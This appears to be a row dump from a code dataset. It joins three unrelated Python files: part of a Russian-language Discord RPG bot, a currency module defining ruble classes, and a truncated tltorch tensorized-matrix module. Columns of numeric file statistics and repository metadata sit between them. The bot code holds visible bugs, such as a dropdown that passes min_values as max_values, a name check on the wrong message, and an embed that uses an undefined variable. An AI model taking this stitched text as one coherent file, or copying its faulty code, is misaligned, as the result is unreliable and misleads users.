if len(inv) == 1:
emb = discord.Embed(description = f'<:inventory_b:886909340550823936> | Инвентарь', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await inf(s_i[0], msg)
if len(inv) == 0:
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В вашем инвентаре не было найдено такого предмета!\nПопробуйте указать более точное название или осмотрите свой инвентарь более подробно!', color=server['embed_color'])
msg = await ctx.send(embed= emb)
if len(inv) > 1:
class Dropdown(discord.ui.Select):
def __init__(self, ctx, msg, options, placeholder, min_values, max_values:int, rem_args):
#options.append(discord.SelectOption(label=f''))
super().__init__(placeholder=placeholder, min_values=min_values, max_values=min_values, options=options)
inv = rem_args[0]
async def callback(self, interaction: discord.Interaction):
if ctx.author.id == interaction.user.id:
print(self.values[0])
self.view.stop()
await inf(inv[self.values[0]]['it'], msg)
else:
await interaction.response.send_message(f'Откройте свой инвентарь!', ephemeral = True)
class DropdownView(discord.ui.View):
def __init__(self, ctx, msg, options:list, placeholder:str, min_values:int = 1, max_values:int = 1, timeout: float = 20.0, rem_args:list = []):
super().__init__(timeout=timeout)
self.add_item(Dropdown(ctx, msg, options, placeholder, min_values, max_values, rem_args))
async def on_timeout(self):
await msg.edit(view = None)
text = ''
n = 0
for k in inv:
i = inv[k]
n += 1
text += f'{n}# {k} x{i["count"]}\n'
options = []
for k in inv:
options.append(discord.SelectOption(label=f'{k}', emoji = inv[k]['it']['emoji']))
emb = discord.Embed(title = '<:inventory_b:886909340550823936> | Инвентарь', description = f'В инвентаре найдено несколько совпадений:\n{text}', color=server['embed_color'])
msg = await ctx.send(embed = emb)
await msg.edit(view=DropdownView(ctx, msg, options = options, placeholder = 'Сделайте выбор...', min_values = 1, max_values=1, timeout = 20.0, rem_args = [inv, emb]))
@commands.command(usage = '(id) (r) [member]', description = 'Выдать предмет.')
async def item_add(self, ctx, id:int, rp:int, member:discord.Member = None):
if member == None:
member = ctx.author
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({"server": ctx.guild.id})
user = funs.user_check(member, ctx.guild)
act_title = '-'
try:
server['items'][str(id)]
except Exception:
await ctx.send(f"Указанный вами предмет не найден!\nПредметы: {', '.join(str(x) for x in list(server['items'].keys()) )} ")
return
item = server['items'][str(id)]
while rp != 0:
user['inv'].append(funs.creat_item(ctx.guild.id, id))
rp -= 1
funs.user_update(member.id, ctx.guild, 'inv', user['inv'])
await ctx.send('Предмет(ы) добавлен(ы)!')
@commands.command(usage = '-', description = 'Создание моба.')
async def create_mob(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
server = servers.find_one({"server": ctx.guild.id})
mob = {}
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(message.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def damage_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def heal_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def armor_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
try:
return int(msg.content)
except Exception:
await ctx.send("Требовалось указать __число__!")
return False
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def drop_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
act = []
try:
try:
act1 = msg.content.split()
for i in act1:
act.append(int(i))
except Exception:
await ctx.send("Требовалось указать __число__, повторите настройку ещё раз.")
return
for i in act:
server['items'][str(i)]
except Exception:
await ctx.send("Требовалось указать __id__ (число) существующего предмета, повторите настройку ещё раз.")
return
async def element_f(message, ctx):
try:
text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
def embed(name = 'Не указано', damage = 'Не указано', image = 'Не указано', quality = 'Не указано', description = 'Не указано', action_m = 'Не указано', race_u = 'Не указано', element = 'Не указано', emoji_v = 'Не указано'):
nonlocal server
emb = discord.Embed(title = "Создание предмета", description = "", color=server['embed_color'])
emb.add_field(name = "Имя моба", value = f"{name}")
emb.add_field(name = "Максимальный урон", value = f"{act}")
if image != 'Не указано' and image != 'none' and image != "Укажите изображение предмета:" and image != None:
emb.set_thumbnail(url = image)
emb.add_field(name = "Качество предмета", value = f"{quality}")
emb.add_field(name = "Описание предмета", value = f"{description}")
emb.add_field(name = "Сообщение при активации", value = f"{action_m}")
if race_u != 'Не указано' and race_u != 'Укажите названия рас, которые могут использовать этот предмет или `all`:' and race_u != 'all' and race_u != None:
emb.add_field(name = "Расы с возможностью использовать", value = f"{','.join(str(x) for x in race_u)}")
else:
emb.add_field(name = "Расы с возможностью использовать", value = f"{race_u}")
emb.add_field(name = "Элемент", value = f"{element}")
emb.add_field(name = "Эмоджи", value = f"{emoji_v}")
emb.set_footer(text = 'Отправляйте сообщения в чат без использованеи команд, на одно указание у вас 60 сек.')
return emb
@commands.command(usage = '-', description = 'Создание локации.')
async def create_location(self, ctx):
if funs.roles_check(ctx.author, ctx.guild.id) == False:
await ctx.send("У вас недостаточно прав для использования этой команды!")
return
async def name_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if len(message.content) > 150:
await ctx.send("Название больше 150-ти символов")
return False
else:
return msg.content
async def image_f(message, ctx):
try:
text = "Требуется указать __ссылку__ на изображение или `none`"
emb = discord.Embed(title = "Изображение:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
if msg.content != 'none':
try:
emb1 = discord.Embed(title = "Изображение", color=server['embed_color'])
emb1.set_thumbnail(url = msg.content)
msg2 = await ctx.send(embed = emb1)
image = msg.content
except Exception:
await ctx.send("Требовалось указать __ссылку__, повторите настройку ещё раз.")
return False
if msg.content == 'none':
image = None
try:
await msg1.delete()
await msg2.delete()
except Exception:
pass
return image
async def description_f(message, ctx):
try:
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg.delete()
except Exception:
pass
description = str(msg.content)
if description == 'none':
return None
elif len(description) > 0 and len(description) < 501:
return msg.content
else:
await ctx.send("Требовалось указать описание (макс 500 символов) или `none`, повторите настройку ещё раз!")
return False
async def element_f(message, ctx):
try:
text = "`w` - <:water:888029916287885332>(water) Огонь >`х0.75`> Вода >`х1.25`> Земля\n`a` - <:air:888029789749919787>(air) Земля >`х0.75`> Воздух >`х1.25`> Огонь\n`f` - <:fire:888029761828425789>(fire) Воздух >`х0.75`> Огонь >`х1.25`> Вода\n`e` - <:earth:888029840945598534>(earth) Вода >`х0.75`> Земля >`х1.25`> Воздух\n\n<:fire:888029761828425789> >`х1.25`> <:water:888029916287885332> >`х1.25`> <:earth:888029840945598534> >`х1.25`> <:air:888029789749919787> >`х1.25`> <:fire:888029761828425789>\n\nУкажите `none` если у предмета нет стихии."
emb = discord.Embed(title = "Элементы:",
description = text, color=server['embed_color'])
msg1 = await ctx.send(embed = emb)
msg = await self.bot.wait_for('message', timeout=60.0, check=lambda message: message.author == ctx.author and message.channel.id == ctx.channel.id)
except asyncio.TimeoutError:
await ctx.send("Время вышло.")
return False
else:
try:
await msg1.delete()
await msg.delete()
except Exception:
pass
if msg.content in ['fire', 'water', 'air', 'earth', 'none', 'w', 'a', 'f', 'e']:
if msg.content in ['w', 'water']:
el = "w"
elif msg.content in ['a', 'air']:
el = "a"
elif msg.content in ['f', 'fire']:
el = "f"
elif msg.content in ['e', 'earth',]:
el = "e"
elif msg.content in ['none']:
el = None
return el
else:
await ctx.send("Требовалось указать 1 из элементов! (w, a, f, e)")
return False
def setup(bot):
bot.add_cog(rpg(bot))
| 46.360437
| 618
| 0.522482
| 12,660
| 114,603
| 4.658373
| 0.046761
| 0.020076
| 0.030114
| 0.031284
| 0.886104
| 0.870437
| 0.860144
| 0.853141
| 0.833896
| 0.817872
| 0
| 0.021578
| 0.36349
| 114,603
| 2,471
| 619
| 46.379199
| 0.786829
| 0.00041
| 0
| 0.816267
| 0
| 0.010779
| 0.221544
| 0.013801
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010779
| false
| 0.025968
| 0.006859
| 0
| 0.130818
| 0.00294
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cb6227a8845c17890e78ff81a5650c9a8aed567
| 9,858
|
py
|
Python
|
multicurrency/ruble.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | 2
|
2021-03-26T18:19:57.000Z
|
2021-07-27T01:15:50.000Z
|
multicurrency/ruble.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
multicurrency/ruble.py
|
fscm/multicurrency
|
5eabdcbfbf427dcafe08d4d05cfce8c9348aeb91
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
#
# copyright: 2020-2022, Frederico Martins
# author: Frederico Martins <http://github.com/fscm>
# license: SPDX-License-Identifier: MIT
"""Ruble currency representation(s)."""
from decimal import Decimal
from typing import Optional, Union
from .currency import Currency
class BelarusianRuble(Currency):
"""Belarusian Ruble currency representation.
Simple usage example:
>>> from multicurrency import BelarusianRuble
>>> belarusian_ruble = BelarusianRuble(
... amount=123456.789)
>>> print(belarusian_ruble)
123 456,79 Br
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'BelarusianRuble':
"""Class creator.
Returns:
BelarusianRuble: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='BYN',
numeric_code='933',
symbol='Br',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='Br',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRuble(Currency):
"""Russian Ruble currency representation.
Simple usage example:
>>> from multicurrency import RussianRuble
>>> russian_ruble = RussianRuble(
... amount=123456.789)
>>> print(russian_ruble)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRuble':
"""Class creator.
Returns:
RussianRuble: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRubleRU(Currency):
"""Russian Ruble RU currency representation.
Simple usage example:
>>> from multicurrency import RussianRubleRU
>>> russian_ruble_ru = RussianRubleRU(
... amount=123456.789)
>>> print(russian_ruble_ru)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRubleRU':
"""Class creator.
Returns:
RussianRubleRU: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='RU₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class RussianRubleGE(Currency):
"""Russian Ruble GE currency representation.
Simple usage example:
>>> from multicurrency import RussianRubleGE
>>> russian_ruble_ge = RussianRubleGE(
... amount=123456.789)
>>> print(russian_ruble_ge)
123 456,79 ₽
For more details see `multicurrency.currency.Currency` .
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2,
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3,
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'RussianRubleGE':
"""Class creator.
Returns:
RussianRubleGE: new opbject.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='RUB',
numeric_code='643',
symbol='₽',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='GE₽',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
| 36.242647
| 77
| 0.600325
| 977
| 9,858
| 5.894575
| 0.114637
| 0.04862
| 0.033339
| 0.026393
| 0.863171
| 0.863171
| 0.846501
| 0.846501
| 0.824622
| 0.801007
| 0
| 0.018865
| 0.30635
| 9,858
| 271
| 78
| 36.376384
| 0.822024
| 0.503348
| 0
| 0.843478
| 0
| 0
| 0.033181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034783
| false
| 0
| 0.026087
| 0
| 0.165217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1cb7f57950a9e0e1c1f1d6ce21dddf90764c0bad
| 32,326
|
py
|
Python
|
tltorch/factorized_tensors/tensorized_matrices.py
|
cassiofragadantas/torch
|
0db832121a82eef34cb75f6006825836cae379ac
|
[
"BSD-3-Clause"
] | null | null | null |
tltorch/factorized_tensors/tensorized_matrices.py
|
cassiofragadantas/torch
|
0db832121a82eef34cb75f6006825836cae379ac
|
[
"BSD-3-Clause"
] | null | null | null |
tltorch/factorized_tensors/tensorized_matrices.py
|
cassiofragadantas/torch
|
0db832121a82eef34cb75f6006825836cae379ac
|
[
"BSD-3-Clause"
] | null | null | null |
import math
import numpy as np
import torch
from torch import nn
import tensorly as tl
tl.set_backend('pytorch')
from tensorly import tenalg
from tensorly.decomposition import parafac, tucker, tensor_train, tensor_train_matrix
from .core import TensorizedMatrix
from ..utils.parameter_list import FactorList
# Author: Jean Kossaifi
# License: BSD 3 clause
def _ensure_tuple(value):
"""Returns a tuple if `value` isn't one already"""
if isinstance(value, int):
if value == 1:
return ()
else:
return (value, )
elif isinstance(value, tuple):
if value == (1,):
return ()
return tuple(value)
else:
return tuple(value)
class CPMatrix(TensorizedMatrix, name='CP'):
"""Tensorized Matrix in CP Form
"""
def __init__(self, weights, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.cp_tensor._validate_cp_tensor((weights, factors))
else:
self.rank = rank
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_shape = tensorized_row_shape + tensorized_column_shape
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
self.order = len(factors)
self.weights = weights
self.factors = factors
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
tensor_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.cp_tensor.validate_cp_rank(tensor_shape, rank)
# Register the parameters
weights = nn.Parameter(torch.Tensor(rank))
# Avoid the issues with ParameterList
factors = [nn.Parameter(torch.Tensor(s, rank)) for s in tensor_shape]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank=rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), init='random', **kwargs):
n_matrices = _ensure_tuple(n_matrices)
rank = tl.cp_tensor.validate_cp_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
weights, factors = parafac(tensor, rank, **kwargs)
weights = nn.Parameter(weights)
factors = [nn.Parameter(f) for f in factors]
return cls(weights, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, **kwargs):
with torch.no_grad():
weights, factors = parafac(tensor, self.rank, **kwargs)
self.weights = nn.Parameter(weights)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.weights, self.factors
def to_tensor(self):
return tl.cp_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
super().normal_(mean, std)
std_factors = (std/math.sqrt(self.rank))**(1/self.order)
with torch.no_grad():
self.weights.fill_(1)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
weights = self.weights*mixing_factor[indices, :]
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
# Index part of a factor
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
weights = self.weights
return self.__class__(weights, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
factors = self.factors
index_factors = []
weights = self.weights
for index in indices:
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices} which contains one.')
mixing_factor, *factors = factors
if isinstance(index, int):
if factors or index_factors:
weights = weights*mixing_factor[index, :]
else:
# No factors left
return tl.sum(weights*mixing_factor[index, :])
else:
index_factors.append(mixing_factor[index])
return self.__class__(weights, index_factors+factors, self.shape, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
class TuckerMatrix(TensorizedMatrix, name='Tucker'):
"""Tensorized Matrix in Tucker Form
"""
def __init__(self, core, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.tucker_tensor._validate_tucker_tensor((core, factors))
else:
self.rank = rank
self.order = self.n_factors = len(factors)
self.shape = (np.prod(tensorized_row_shape), np.prod(tensorized_column_shape))
self.tensorized_row_shape = tensorized_row_shape
self.tensorized_column_shape = tensorized_column_shape
self.n_matrices = _ensure_tuple(n_matrices)
setattr(self, 'core', core)
self.factors = FactorList(factors)
@classmethod
def new(cls, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
full_shape = n_matrices + tensorized_row_shape + tensorized_column_shape
rank = tl.tucker_tensor.validate_tucker_rank(full_shape, rank)
core = nn.Parameter(torch.Tensor(*rank))
factors = [nn.Parameter(torch.Tensor(s, r)) for (s, r) in zip(full_shape, rank)]
return cls(core, factors, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_tensor(cls, tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=(), **kwargs):
n_matrices = _ensure_tuple(n_matrices)
rank = tl.tucker_tensor.validate_tucker_rank(n_matrices + tensorized_row_shape + tensorized_column_shape, rank)
with torch.no_grad():
core, factors = tucker(tensor, rank, **kwargs)
return cls(nn.Parameter(core), [nn.Parameter(f) for f in factors], tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices)
@classmethod
def from_matrix(cls, matrix, tensorized_row_shape, tensorized_column_shape, rank, **kwargs):
if matrix.ndim > 2:
n_matrices = _ensure_tuple(tl.shape(matrix)[:-2])
else:
n_matrices = ()
tensor = matrix.reshape((*n_matrices, *tensorized_row_shape, *tensorized_column_shape))
return cls.from_tensor(tensor, tensorized_row_shape, tensorized_column_shape, rank, n_matrices=n_matrices, **kwargs)
def init_from_tensor(self, tensor, init='svd', **kwargs):
with torch.no_grad():
core, factors = tucker(tensor, self.rank, **kwargs)
self.core = nn.Parameter(core)
self.factors = FactorList([nn.Parameter(f) for f in factors])
return self
def init_from_matrix(self, matrix, **kwargs):
tensor = matrix.reshape((*self.n_matrices, *self.tensorized_row_shape, *self.tensorized_column_shape))
return self.init_from_tensor(tensor, **kwargs)
@property
def decomposition(self):
return self.core, self.factors
def to_tensor(self):
return tl.tucker_to_tensor(self.decomposition)
def normal_(self, mean=0, std=1):
if mean != 0:
raise ValueError(f'Currently only mean=0 is supported, but got mean={mean}')
r = np.prod([math.sqrt(r) for r in self.rank])
std_factors = (std/r)**(1/(self.order+1))
with torch.no_grad():
self.core.data.normal_(0, std_factors)
for factor in self.factors:
factor.data.normal_(0, std_factors)
return self
def __getitem__(self, indices):
if isinstance(indices, int):
# Select one dimension of one mode
mixing_factor, *factors = self.factors
core = tenalg.mode_dot(self.core, mixing_factor[indices, :], 0)
return self.__class__(core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
elif isinstance(indices, slice):
mixing_factor, *factors = self.factors
factors = [mixing_factor[indices], *factors]
return self.__class__(self.core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[1:])
else:
# Index multiple dimensions
modes = []
factors = []
factors_contract = []
for i, (index, factor) in enumerate(zip(indices, self.factors)):
if index is Ellipsis:
raise ValueError(f'Ellipsis is not yet supported, yet got indices={indices}, indices[{i}]={index}.')
if isinstance(index, int):
modes.append(i)
factors_contract.append(factor[index])
else:
factors.append(factor[index])
core = tenalg.multi_mode_dot(self.core, factors_contract, modes=modes)
factors = factors + self.factors[i+1:]
if factors:
return self.__class__(core, factors, self.tensorized_row_shape,
self.tensorized_column_shape, n_matrices=self.n_matrices[len(indices):])
# Fully contracted tensor
return core
class TTTensorized(TensorizedMatrix, name='TT'):
"""Tensorized Matrix in Tensor-Train (MPS) Form
Notes
-----
It may be preferable to use TTMatrix instead
See Also
--------
TTMatrix
"""
def __init__(self, factors, tensorized_row_shape, tensorized_column_shape, rank=None, n_matrices=()):
super().__init__()
if rank is None:
_, self.rank = tl.tt_tensor._validate_tt_tensor(factors)
else:
self.rank = rank
self.order = self.n_factors = len(factors)
